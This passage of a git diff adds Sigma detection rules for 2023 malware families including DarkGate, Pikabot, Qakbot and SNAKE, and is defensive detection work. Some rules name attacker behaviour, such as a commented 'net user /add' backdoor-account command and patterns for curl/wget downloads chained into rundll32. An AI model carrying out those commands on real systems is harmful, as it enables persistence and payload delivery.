f8e9aa1c-14f2-4dbd-aa59-b98968ed650d +status: experimental +description: | + Detects execution of the legitimate Autoit3 utility from a suspicious parent process. AutoIt3.exe is used within + the DarkGate infection chain to execute shellcode that performs process injection and connects to the DarkGate + command-and-control server. +references: + - https://github.security.telekom.com/2023/08/darkgate-loader.html + - https://www.kroll.com/en/insights/publications/cyber/microsoft-teams-used-as-initial-access-for-darkgate-malware + - https://github.com/pr0xylife/DarkGate/tree/main +author: Micah Babinski +date: 2023/10/15 +tags: + - attack.execution + - attack.t1059 + - detection.emerging_threats +logsource: + category: process_creation + product: windows +detection: + process_creation: + EventID: 4688 + Channel: Security + selection_proc: + - NewProcessName|endswith: \Autoit3.exe + - OriginalFileName: AutoIt3.exe + selection_parent: + ParentProcessName|endswith: + - \cmd.exe + - \KeyScramblerLogon.exe + - \msiexec.exe + filter_main_legit_autoit_location: + NewProcessName|endswith: + - :\Program Files (x86)\AutoIt3\AutoIt3.exe + - :\Program Files\AutoIt3\AutoIt3.exe + condition: process_creation and (all of selection_* and not 1 of filter_main_*) +falsepositives: + - Unlikely +level: high +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2023/Malware/DarkGate/proc_creation_win_malware_darkgate_net_user_creation.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2023/Malware/DarkGate/proc_creation_win_malware_darkgate_net_user_creation.yml new file mode 100644 index 000000000..5cc0bceca --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2023/Malware/DarkGate/proc_creation_win_malware_darkgate_net_user_creation.yml @@ -0,0 +1,35 @@ +title: DarkGate - User Created Via Net.EXE +id: bf906d7b-7070-4642-8383-e404cf26eba5 +status: experimental +description: Detects creation of local users via the net.exe command with the name of "DarkGate" +references: + - Internal Research +author: X__Junior (Nextron Systems) +date: 2023/08/27 +modified: 2023/10/15 +tags: + - attack.persistence + - attack.t1136.001 + - detection.emerging_threats +logsource: + category: process_creation + product: windows +detection: + # /c net user /add SafeMode DarkGate0! + process_creation: + EventID: 4688 + Channel: Security + selection: + CommandLine|contains|all: + - user + - add + - DarkGate + - SafeMode + NewProcessName|endswith: + - \net.exe + - \net1.exe + condition: process_creation and selection +falsepositives: + - Unlikely +level: high +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2023/Malware/Griffon/proc_creation_win_malware_griffon_patterns.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2023/Malware/Griffon/proc_creation_win_malware_griffon_patterns.yml new file mode 100644 index 000000000..309d7c208 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2023/Malware/Griffon/proc_creation_win_malware_griffon_patterns.yml @@ -0,0 +1,28 @@ +title: Griffon Malware Attack Pattern +id: bcc6f179-11cd-4111-a9a6-0fab68515cf7 +status: experimental +description: Detects process execution patterns related to Griffon malware as reported by Kaspersky +references: + - https://securelist.com/fin7-5-the-infamous-cybercrime-rig-fin7-continues-its-activities/90703/ +author: Nasreddine Bencherchali (Nextron Systems) +date: 2023/03/09 +tags: + - attack.execution + - detection.emerging_threats +logsource: + category: process_creation + product: windows +detection: + process_creation: + EventID: 4688 + Channel: Security + selection: + CommandLine|contains|all: + - \local\temp\ + - //b /e:jscript + - .txt + condition: process_creation and selection +falsepositives: + - Unlikely +level: critical +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2023/Malware/IcedID/proc_creation_win_malware_icedid_rundll32_dllregisterserver.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2023/Malware/IcedID/proc_creation_win_malware_icedid_rundll32_dllregisterserver.yml new file mode 100644 index 000000000..b787c5815 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2023/Malware/IcedID/proc_creation_win_malware_icedid_rundll32_dllregisterserver.yml @@ -0,0 +1,30 @@ +title: IcedID Malware Suspicious Single Digit DLL Execution Via Rundll32 +id: 2bd8e100-5b3b-4b6a-bbb5-b129d3ddddc5 +status: experimental +description: Detects RunDLL32.exe executing a single digit DLL named "1.dll" with the export function "DllRegisterServer". This behaviour was often seen used by malware and especially IcedID +references: + - https://thedfirreport.com/2023/05/22/icedid-macro-ends-in-nokoyawa-ransomware/ + - https://thedfirreport.com/2023/08/28/html-smuggling-leads-to-domain-wide-ransomware/ +author: Nasreddine Bencherchali (Nextron Systems) +date: 2023/08/31 +tags: + - attack.defense_evasion + - attack.t1218.011 + - detection.emerging_threats +logsource: + category: process_creation + product: windows +detection: + process_creation: + EventID: 4688 + Channel: Security + selection: + CommandLine|endswith: + - \1.dll, DllRegisterServer # In case of full path exec + - ' 1.dll, DllRegisterServer' # In case of direct exec + NewProcessName|endswith: \rundll32.exe + condition: process_creation and selection +falsepositives: + - Unknown +level: high +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2023/Malware/Pikabot/proc_creation_win_malware_pikabot_combined_commands_execution.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2023/Malware/Pikabot/proc_creation_win_malware_pikabot_combined_commands_execution.yml new file mode 100644 index 000000000..eb0b05b05 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2023/Malware/Pikabot/proc_creation_win_malware_pikabot_combined_commands_execution.yml @@ -0,0 +1,48 @@ +title: Potential Pikabot Infection - Suspicious Command Combinations Via Cmd.EXE +id: e5144106-8198-4f6e-bfc2-0a551cc8dd94 +status: experimental +description: | + Detects the execution of concatenated commands via "cmd.exe". Pikabot often executes a combination of multiple commands via the command handler "cmd /c" in order to download and execute additional payloads. + Commands such as "curl", "wget" in order to download extra payloads. "ping" and "timeout" are abused to introduce delays in the command execution and "Rundll32" is also used to execute malicious DLL files. + In the observed Pikabot infections, a combination of the commands described above are used to orchestrate the download and execution of malicious DLL files. +references: + - https://github.com/pr0xylife/Pikabot/blob/7f7723a74ca325ec54c6e61e076acce9a4b20538/Pikabot_30.10.2023.txt + - https://github.com/pr0xylife/Pikabot/blob/7f7723a74ca325ec54c6e61e076acce9a4b20538/Pikabot_22.12.2023.txt +author: Alejandro Houspanossian ('@lekz86') +date: 2024/01/02 +tags: + - attack.execution + - attack.t1059.003 + - attack.t1105 + - attack.t1218 + - detection.emerging_threats +logsource: + product: windows + category: process_creation +detection: + process_creation: + EventID: 4688 + Channel: Security + selection_cmd: + CommandLine|contains|all: + - cmd + - /c + selection_pipes: + CommandLine|contains: + - ' & ' + - ' || ' + selection_commands_1: + CommandLine|contains: + - ' curl' + - ' wget' + - ' timeout ' + - ' ping ' + selection_commands_2: + CommandLine|contains: + - ' rundll32' + - ' mkdir ' + condition: process_creation and (all of selection_*) +falsepositives: + - Unknown +level: medium +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2023/Malware/Pikabot/proc_creation_win_malware_pikabot_rundll32_discovery.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2023/Malware/Pikabot/proc_creation_win_malware_pikabot_rundll32_discovery.yml new file mode 100644 index 000000000..ef3cd6a8a --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2023/Malware/Pikabot/proc_creation_win_malware_pikabot_rundll32_discovery.yml @@ -0,0 +1,36 @@ +title: Potential Pikabot Discovery Activity - Suspicious Process Created By Rundll32.EXE +id: 698d4431-514f-4c82-af4d-cf573872a9f5 +status: experimental +description: | + Detects the execution of rundll32 that leads to system discovery activity, such as incl. network, user info and domain groups. + The malware Pikabot has been seen to use this technique as part of its C2-botnet registration with a short collection time frame (less than 1 minute). +references: + - https://www.virustotal.com/gui/file/72f1a5476a845ea02344c9b7edecfe399f64b52409229edaf856fcb9535e3242 +author: Andreas Braathen (mnemonic.io) +date: 2023/10/27 +tags: + - attack.discovery + - attack.t1016 + - attack.t1049 + - attack.t1087 + - detection.emerging_threats +logsource: + product: windows + category: process_creation + definition: 'Requirements: By default the process_creation type event might not contain the GrandParentImage. Make sure you collect such fields in order to use this rule' +detection: + process_creation: + EventID: 4688 + Channel: Security + selection: + GrandParentImage|endswith: \rundll32.exe + CommandLine: + # Note: Only add strings as seen used by Pikabot to avoid collision with other strains of malware + - ipconfig.exe /all + - netstat.exe -aon + - whoami.exe /all + condition: process_creation and selection +falsepositives: + - Unlikely +level: high +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2023/Malware/Pikabot/proc_creation_win_malware_pikabot_rundll32_hollowing.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2023/Malware/Pikabot/proc_creation_win_malware_pikabot_rundll32_hollowing.yml new file mode 100644 index 000000000..61cb4db93 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2023/Malware/Pikabot/proc_creation_win_malware_pikabot_rundll32_hollowing.yml @@ -0,0 +1,37 @@ +title: Potential Pikabot Hollowing Activity - Suspicious Process Created By Rundll32.EXE +id: d8937fe7-42d5-4b4d-8178-e089c908f63f +status: experimental +description: | + Detects the execution of rundll32 that leads to the invocation of legitimate Windows binaries. + The malware Pikabot has been seen to use this technique for process hollowing through hard-coded Windows binaries +references: + - https://www.virustotal.com/gui/file/b6e8910fb9b3bb1fcddefd35ff0ed8624930d30d6977e11808c8330415685a62 +author: Andreas Braathen (mnemonic.io) +date: 2023/10/27 +tags: + - attack.defense_evasion + - attack.t1055.012 + - detection.emerging_threats +logsource: + product: windows + category: process_creation +detection: + process_creation: + EventID: 4688 + Channel: Security + selection: + ParentProcessName|endswith: \rundll32.exe + NewProcessName|endswith: + # Note: Only add processes seen used by Pikabot to avoid collision with other strains of malware + - \searchprotocolhost.exe + - \sndvol.exe + - \wermgr.exe + - \wwahost.exe + filter_main_legit_sndvol: + ParentCommandLine|contains: mmsys.cpl + NewProcessName|endswith: \sndvol.exe + condition: process_creation and (selection and not 1 of filter_main_*) +falsepositives: + - Unlikely +level: high +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2023/Malware/Qakbot/proc_creation_win_malware_qakbot_regsvr32_calc_pattern.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2023/Malware/Qakbot/proc_creation_win_malware_qakbot_regsvr32_calc_pattern.yml new file mode 100644 index 000000000..b4e75b47d --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2023/Malware/Qakbot/proc_creation_win_malware_qakbot_regsvr32_calc_pattern.yml @@ -0,0 +1,30 @@ +title: Qakbot Regsvr32 Calc Pattern +id: 0033cf83-fb87-446d-9cac-43d63ad4d5a9 +status: experimental +description: Detects a specific command line of "regsvr32" where the "calc" keyword is used in conjunction with the "/s" flag. This behavior is often seen used by Qakbot +references: + - https://github.com/pr0xylife/Qakbot/ +author: Nasreddine Bencherchali (Nextron Systems) +date: 2023/05/26 +tags: + - attack.defense_evasion + - attack.execution + - detection.emerging_threats +logsource: + product: windows + category: process_creation +detection: + process_creation: + EventID: 4688 + Channel: Security + selection: + CommandLine|contains: + - ' /s' + - ' -s' + CommandLine|endswith: ' calc' + NewProcessName|endswith: \regsvr32.exe + condition: process_creation and selection +falsepositives: + - Unlikely +level: high +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2023/Malware/Qakbot/proc_creation_win_malware_qakbot_rundll32_execution.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2023/Malware/Qakbot/proc_creation_win_malware_qakbot_rundll32_execution.yml new file mode 100644 index 000000000..13805359e --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2023/Malware/Qakbot/proc_creation_win_malware_qakbot_rundll32_execution.yml @@ -0,0 +1,43 @@ +title: Potential Qakbot Rundll32 Execution +id: cf879ffb-793a-4753-9a14-bc8f37cc90df +status: experimental +description: Detects specific process tree behavior of a "rundll32" execution often linked with potential Qakbot activity. +references: + - https://github.com/pr0xylife/Qakbot/ +author: X__Junior (Nextron Systems) +date: 2023/05/24 +tags: + - attack.defense_evasion + - attack.execution + - detection.emerging_threats +logsource: + product: windows + category: process_creation +detection: + process_creation: + EventID: 4688 + Channel: Security + selection_paths: + CommandLine|contains: + # Note: Only add paths seen used by Qakbot to avoid collision with other strains of malware + - :\ProgramData\ + - :\Users\Public\ + - \AppData\Local\Temp\ + - \AppData\Roaming\ + ParentProcessName|endswith: + # Note: Only add processes seen used by Qakbot to avoid collision with other strains of malware + - \cmd.exe + - \cscript.exe + - \curl.exe + - \mshta.exe + - \powershell.exe + - \pwsh.exe + - \wscript.exe + NewProcessName|endswith: \rundll32.exe + selection_extension: + CommandLine|contains: .dll + condition: process_creation and (all of selection_*) +falsepositives: + - Unlikely +level: high +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2023/Malware/Qakbot/proc_creation_win_malware_qakbot_rundll32_exports.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2023/Malware/Qakbot/proc_creation_win_malware_qakbot_rundll32_exports.yml new file mode 100644 index 000000000..d72dabfc0 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2023/Malware/Qakbot/proc_creation_win_malware_qakbot_rundll32_exports.yml @@ -0,0 +1,71 @@ +title: Qakbot Rundll32 Exports Execution +id: 339ed3d6-5490-46d0-96a7-8abe33078f58 +status: experimental +description: Detects specific process tree behavior of a "rundll32" execution with exports linked with Qakbot activity. +references: + - https://github.com/pr0xylife/Qakbot/ +author: X__Junior (Nextron Systems) +date: 2023/05/24 +modified: 2023/05/30 +tags: + - attack.defense_evasion + - attack.execution + - detection.emerging_threats +logsource: + product: windows + category: process_creation +detection: + process_creation: + EventID: 4688 + Channel: Security + selection_paths: + CommandLine|contains: + # Note: Only add paths seen used by Qakbot to avoid collision with other strains of malware + - :\ProgramData\ + - :\Users\Public\ + - \AppData\Local\Temp\ + - \AppData\Roaming\ + ParentProcessName|endswith: + # Note: Only add processes seen used by Qakbot to avoid collision with other strains of malware + - \cmd.exe + - \cscript.exe + - \curl.exe + - \mshta.exe + - \powershell.exe + - \pwsh.exe + - \wscript.exe + NewProcessName|endswith: \rundll32.exe + selection_exports: + CommandLine|endswith: + # Note: Only add additional exports seen used by Qakbot + - aslr # https://tria.ge/230524-scgq9add9v/behavioral1#report + - bind + - DrawThemeIcon + - GG10 + - GL70 + - jhbvygftr + - kjhbhkjvydrt + - LS88 + - Motd + - N115 + - next # https://tria.ge/230530-n3rxpahf9w/behavioral2 + - Nikn + - print + - qqqb + - qqqq + - RS32 + - Test + - Time + - Updt + - vips + - Wind + - WW50 + - X555 + - XL55 + - xlAutoOpen + - XS88 + condition: process_creation and (all of selection_*) +falsepositives: + - Unlikely +level: critical +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2023/Malware/Qakbot/proc_creation_win_malware_qakbot_rundll32_fake_dll_execution.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2023/Malware/Qakbot/proc_creation_win_malware_qakbot_rundll32_fake_dll_execution.yml new file mode 100644 index 000000000..854e6d612 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2023/Malware/Qakbot/proc_creation_win_malware_qakbot_rundll32_fake_dll_execution.yml @@ -0,0 +1,43 @@ +title: Qakbot Rundll32 Fake DLL Extension Execution +id: bfd34392-c591-4009-b938-9fd985a28b85 +status: experimental +description: Detects specific process tree behavior of a "rundll32" execution where the DLL doesn't have the ".dll" extension. This is often linked with potential Qakbot activity. +references: + - https://github.com/pr0xylife/Qakbot/ +author: X__Junior (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) +date: 2023/05/24 +tags: + - attack.defense_evasion + - attack.execution + - detection.emerging_threats +logsource: + product: windows + category: process_creation +detection: + process_creation: + EventID: 4688 + Channel: Security + selection: + CommandLine|contains: + # Note: Only add paths seen used by Qakbot to avoid collision with other strains of malware + - :\ProgramData\ + - :\Users\Public\ + - \AppData\Local\Temp\ + - \AppData\Roaming\ + ParentProcessName|endswith: + # Note: Only add processes seen used by Qakbot to avoid collision with other strains of malware + - \cmd.exe + - \cscript.exe + - \curl.exe + - \mshta.exe + - \powershell.exe + - \pwsh.exe + - \wscript.exe + NewProcessName|endswith: \rundll32.exe + filter_main_extension: + CommandLine|contains: .dll + condition: process_creation and (selection and not 1 of filter_main_*) +falsepositives: + - Unlikely +level: critical +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2023/Malware/Qakbot/proc_creation_win_malware_qakbot_uninstaller_cleanup.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2023/Malware/Qakbot/proc_creation_win_malware_qakbot_uninstaller_cleanup.yml new file mode 100644 index 000000000..af3fa3ddc --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2023/Malware/Qakbot/proc_creation_win_malware_qakbot_uninstaller_cleanup.yml @@ -0,0 +1,34 @@ +title: Qakbot Uninstaller Execution +id: bc309b7a-3c29-4937-a4a3-e232473f9168 +status: experimental +description: Detects the execution of the Qakbot uninstaller file mentioned in the USAO-CDCA document on the disruption of the Qakbot malware and botnet +references: + - https://www.justice.gov/usao-cdca/divisions/national-security-division/qakbot-resources + - https://www.virustotal.com/gui/file/7cdee5a583eacf24b1f142413aabb4e556ccf4ef3a4764ad084c1526cc90e117/community + - https://www.virustotal.com/gui/file/fab408536aa37c4abc8be97ab9c1f86cb33b63923d423fdc2859eb9d63fa8ea0/community +author: Florian Roth (Nextron Systems) +date: 2023/08/31 +modified: 2023/09/01 +tags: + - detection.emerging_threats + - attack.execution +logsource: + category: process_creation + product: windows +detection: + process_creation: + EventID: 4688 + Channel: Security + selection: + - NewProcessName|endswith: \QbotUninstall.exe + - Hashes|contains: + - IMPHASH=E772C815072311D6FB8C3390743E6BE5 + - SHA256=423A9D13D410E2DC38EABB9FDF3121D2072472D0426260283A638B822DCD5180 + - SHA256=559CAE635F0D870652B9482EF436B31D4BB1A5A0F51750836F328D749291D0B6 + - SHA256=855EB5481F77DDE5AD8FA6E9D953D4AEBC280DDDF9461144B16ED62817CC5071 + - SHA256=FAB408536AA37C4ABC8BE97AB9C1F86CB33B63923D423FDC2859EB9D63FA8EA0 + condition: process_creation and selection +falsepositives: + - Unlikely +level: high +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2023/Malware/Rhadamanthys/proc_creation_win_malware_rhadamanthys_stealer_dll_launch.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2023/Malware/Rhadamanthys/proc_creation_win_malware_rhadamanthys_stealer_dll_launch.yml new file mode 100644 index 000000000..9bed93d19 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2023/Malware/Rhadamanthys/proc_creation_win_malware_rhadamanthys_stealer_dll_launch.yml @@ -0,0 +1,35 @@ +title: Rhadamanthys Stealer Module Launch Via Rundll32.EXE +id: 5cdbc2e8-86dd-43df-9a1a-200d4745fba5 +status: test +description: Detects the use of Rundll32 to launch an NSIS module that serves as the main stealer capability of Rhadamanthys infostealer, as observed in reports and samples in early 2023 +references: + - https://elis531989.medium.com/dancing-with-shellcodes-analyzing-rhadamanthys-stealer-3c4986966a88 + - https://blog.cyble.com/2023/01/12/rhadamanthys-new-stealer-spreading-through-google-ads/ + - https://www.joesandbox.com/analysis/790122/0/html + - https://twitter.com/anfam17/status/1607477672057208835 +author: TropChaud +date: 2023/01/26 +modified: 2023/02/05 +tags: + - attack.defense_evasion + - attack.t1218.011 + - detection.emerging_threats +logsource: + category: process_creation + product: windows +detection: + process_creation: + EventID: 4688 + Channel: Security + selection_rundll32: + - OriginalFileName: RUNDLL32.EXE + - NewProcessName|endswith: \rundll32.exe + selection_dll: + CommandLine|contains: nsis_uns + selection_export_function: + CommandLine|contains: PrintUIEntry + condition: process_creation and (all of selection_*) +falsepositives: + - Unknown +level: medium +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2023/Malware/Rorschach/proc_creation_win_malware_rorschach_ransomware_activity.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2023/Malware/Rorschach/proc_creation_win_malware_rorschach_ransomware_activity.yml new file mode 100644 index 000000000..370c7e1e5 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2023/Malware/Rorschach/proc_creation_win_malware_rorschach_ransomware_activity.yml @@ -0,0 +1,36 @@ +title: Rorschach Ransomware Execution Activity +id: 0e9e6c63-1350-48c4-9fa1-7ccb235edc68 +status: experimental +description: Detects Rorschach ransomware execution activity +references: + - https://research.checkpoint.com/2023/rorschach-a-new-sophisticated-and-fast-ransomware/ +author: X__Junior (Nextron Systems) +date: 2023/04/04 +modified: 2023/04/22 +tags: + - attack.execution + - attack.t1059.003 + - attack.t1059.001 + - attack.defense_evasion + - detection.emerging_threats +logsource: + category: process_creation + product: windows +detection: + process_creation: + EventID: 4688 + Channel: Security + selection: + CommandLine|contains: '11111111' + NewProcessName|endswith: + - \bcdedit.exe + - \net.exe + - \net1.exe + - \netsh.exe + - \wevtutil.exe + - \vssadmin.exe + condition: process_creation and selection +falsepositives: + - Unlikely +level: critical +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2023/Malware/SNAKE/proc_creation_win_malware_snake_installer_cli_args.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2023/Malware/SNAKE/proc_creation_win_malware_snake_installer_cli_args.yml new file mode 100644 index 000000000..7d35a7cf4 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2023/Malware/SNAKE/proc_creation_win_malware_snake_installer_cli_args.yml @@ -0,0 +1,29 @@ +title: Potential SNAKE Malware Installation CLI Arguments Indicator +id: 02cbc035-b390-49fe-a9ff-3bb402c826db +status: experimental +description: Detects a specific command line arguments sequence seen used by SNAKE malware during its installation as described by CISA in their report +references: + - https://media.defense.gov/2023/May/09/2003218554/-1/-1/0/JOINT_CSA_HUNTING_RU_INTEL_SNAKE_MALWARE_20230509.PDF +author: Nasreddine Bencherchali (Nextron Systems) +date: 2023/05/04 +tags: + - attack.execution + - detection.emerging_threats +logsource: + category: process_creation + product: windows +detection: + process_creation: + EventID: 4688 + Channel: Security + selection: + # This CLI regex is based on the following description from the report: + # The jpsetup.exe installer requires two arguments to be passed via the command line for execution + # The first argument is a wide character string hashed with SHA-256 twice -> We assume that the first argument is of length SHA256 + # The AES initialization vector (IV) consists of the first 16 bytes of the second argument to jpsetup.exe -> We assume that the second argument is of at least 16 bytes (16 characters) + CommandLine|re: \s[a-fA-F0-9]{64}\s[a-fA-F0-9]{16} + condition: process_creation and selection +falsepositives: + - Unlikely +level: high +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2023/Malware/SNAKE/proc_creation_win_malware_snake_installer_exec.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2023/Malware/SNAKE/proc_creation_win_malware_snake_installer_exec.yml new file mode 100644 index 000000000..667f4e15a --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2023/Malware/SNAKE/proc_creation_win_malware_snake_installer_exec.yml @@ -0,0 +1,37 @@ +title: Potential SNAKE Malware Installation Binary Indicator +id: d91ff53f-fd0c-419d-a6b8-ae038d5c3733 +status: experimental +description: Detects a specific binary name seen used by SNAKE malware during its installation as described by CISA in their report +references: + - https://media.defense.gov/2023/May/09/2003218554/-1/-1/0/JOINT_CSA_HUNTING_RU_INTEL_SNAKE_MALWARE_20230509.PDF +author: Nasreddine Bencherchali (Nextron Systems) +date: 2023/05/04 +tags: + - attack.execution + - detection.emerging_threats +logsource: + category: process_creation + product: windows +detection: + process_creation: + EventID: 4688 + Channel: Security + selection: + NewProcessName|endswith: + - \jpsetup.exe + - \jpinst.exe + filter_main_cli_name: + CommandLine: + - jpinst.exe + - jpinst + - jpsetup.exe + - jpsetup + filter_main_cli_empty: + CommandLine: '' + filter_main_cli_null: + CommandLine: + condition: process_creation and (selection and not 1 of filter_main_*) +falsepositives: + - Unlikely +level: high +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2023/Malware/SNAKE/proc_creation_win_malware_snake_service_execution.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2023/Malware/SNAKE/proc_creation_win_malware_snake_service_execution.yml new file mode 100644 index 000000000..a63d4bdaa --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2023/Malware/SNAKE/proc_creation_win_malware_snake_service_execution.yml @@ -0,0 +1,27 @@ +title: Potential SNAKE Malware Persistence Service Execution +id: f7536642-4a08-4dd9-b6d5-c3286d8975ed +status: experimental +description: Detects a specific child/parent process relationship indicative of a "WerFault" process running from the "WinSxS" as a service. This could be indicative of potential SNAKE malware activity as reported by CISA. +references: + - https://media.defense.gov/2023/May/09/2003218554/-1/-1/0/JOINT_CSA_HUNTING_RU_INTEL_SNAKE_MALWARE_20230509.PDF +author: Nasreddine Bencherchali (Nextron Systems) +date: 2023/05/04 +tags: + - attack.execution + - detection.emerging_threats +logsource: + category: process_creation + product: windows +detection: + process_creation: + EventID: 4688 + Channel: Security + selection: + ParentProcessName|endswith: \services.exe + NewProcessName|startswith: C:\Windows\WinSxS\ + NewProcessName|endswith: \WerFault.exe + condition: process_creation and selection +falsepositives: + - Unknown +level: high +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2023/Malware/SNAKE/registry_event_malware_snake_covert_store_key.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2023/Malware/SNAKE/registry_event_malware_snake_covert_store_key.yml new file mode 100644 index 000000000..efcdeee56 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2023/Malware/SNAKE/registry_event_malware_snake_covert_store_key.yml @@ -0,0 +1,23 @@ +title: SNAKE Malware Covert Store Registry Key +id: d0fa35db-0e92-400e-aa16-d32ae2521618 +status: experimental +description: Detects any registry event that targets the key 'SECURITY\Policy\Secrets\n' which is a key related to SNAKE malware as described by CISA +references: + - https://media.defense.gov/2023/May/09/2003218554/-1/-1/0/JOINT_CSA_HUNTING_RU_INTEL_SNAKE_MALWARE_20230509.PDF +author: Nasreddine Bencherchali (Nextron Systems) +date: 2023/05/11 +tags: + - attack.persistence + - detection.emerging_threats +logsource: + category: registry_event + product: windows +detection: + registry_event: + EventID: 4657 + Channel: Security + selection: + ObjectName|endswith: SECURITY\Policy\Secrets\n + condition: registry_event and selection +level: high +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2023/Malware/SNAKE/registry_set_malware_snake_encrypted_key.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2023/Malware/SNAKE/registry_set_malware_snake_encrypted_key.yml new file mode 100644 index 000000000..e8c30e58a --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2023/Malware/SNAKE/registry_set_malware_snake_encrypted_key.yml @@ -0,0 +1,29 @@ +title: Potential Encrypted Registry Blob Related To SNAKE Malware +id: 7e163e96-b9a5-45d6-b2cd-d7d87b13c60b +status: experimental +description: Detects the creation of a registry value in the ".wav\OpenWithProgIds" key with an uncommon name. This could be related to SNAKE Malware as reported by CISA +references: + - https://media.defense.gov/2023/May/09/2003218554/-1/-1/0/JOINT_CSA_HUNTING_RU_INTEL_SNAKE_MALWARE_20230509.PDF +author: Nasreddine Bencherchali (Nextron Systems) +date: 2023/05/10 +modified: 2023/08/17 +tags: + - attack.persistence + - detection.emerging_threats +logsource: + category: registry_set + product: windows +detection: + registry_set: + EventID: 4657 + Channel: Security + selection: + ObjectName|contains: \SOFTWARE\Classes\.wav\OpenWithProgIds\ + filter_main_wav: + - ObjectName|endswith: .AssocFile.WAV + - ObjectName|contains: .wav. + condition: registry_set and (selection and not 1 of filter_main_*) +falsepositives: + - Some additional tuning might be required to tune out legitimate processes that write to this key by default +level: medium +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2023/Malware/SNAKE/win_system_malware_snake_persistence_service.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2023/Malware/SNAKE/win_system_malware_snake_persistence_service.yml new file mode 100644 index 000000000..c1217463b --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2023/Malware/SNAKE/win_system_malware_snake_persistence_service.yml @@ -0,0 +1,28 @@ +title: SNAKE Malware Service Persistence +id: b2e60816-96b2-45bd-ba91-b63578c03ef6 +status: experimental +description: Detects the creation of a service named "WerFaultSvc" which seems to be used by the SNAKE malware as a persistence mechanism as described by CISA in their report +references: + - https://media.defense.gov/2023/May/09/2003218554/-1/-1/0/JOINT_CSA_HUNTING_RU_INTEL_SNAKE_MALWARE_20230509.PDF +author: Nasreddine Bencherchali (Nextron Systems) +date: 2023/05/10 +tags: + - attack.persistence + - detection.emerging_threats +logsource: + product: windows + service: system +detection: + system: + Channel: System + selection: + Provider_Name: Service Control Manager + EventID: 7045 + ServiceName|contains: WerFaultSvc # Note: The report contains a "," in the name ("WerFaultSvc,"). Since we can't confirm if its a typo or not we don't use it + ImagePath|startswith: C:\Windows\WinSxS\ + ImagePath|endswith: \WerFault.exe + condition: system and selection +falsepositives: + - Unknown +level: critical +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2023/TA/3CX-Supply-Chain/proc_creation_win_malware_3cx_compromise_execution.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2023/TA/3CX-Supply-Chain/proc_creation_win_malware_3cx_compromise_execution.yml new file mode 100644 index 000000000..fe135e832 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2023/TA/3CX-Supply-Chain/proc_creation_win_malware_3cx_compromise_execution.yml @@ -0,0 +1,104 @@ +title: Potential Compromised 3CXDesktopApp Execution +id: 93bbde78-dc86-4e73-9ffc-ff8a384ca89c +related: + - id: 3c4b3bbf-36b4-470c-b6cf-f07e8b1c7e26 # 